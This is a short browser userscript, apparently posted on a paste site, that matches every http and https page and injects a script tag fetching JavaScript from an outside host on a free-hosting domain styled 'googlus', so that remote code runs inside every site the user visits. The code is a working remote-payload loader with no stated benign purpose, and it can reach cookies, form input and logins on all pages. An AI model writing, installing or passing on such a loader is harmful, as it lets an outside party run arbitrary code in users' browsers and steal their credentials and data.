NOTICE: By continued use of this site you understand and agree to the binding Terms of Service and Privacy Policy.
// ==UserScript==
// @name all
// @namespace all
// @match http://*/*
// @match https://*/*
// @version 1
// @grant none
// ==/UserScript==
window.host00 = 'all';
var my_awesome_script = document.createElement('script');
my_awesome_script.setAttribute('src','https://googlus.000webhostapp.com/js/gm.js?v='+Date.now());
document.head.appendChild(my_awesome_script);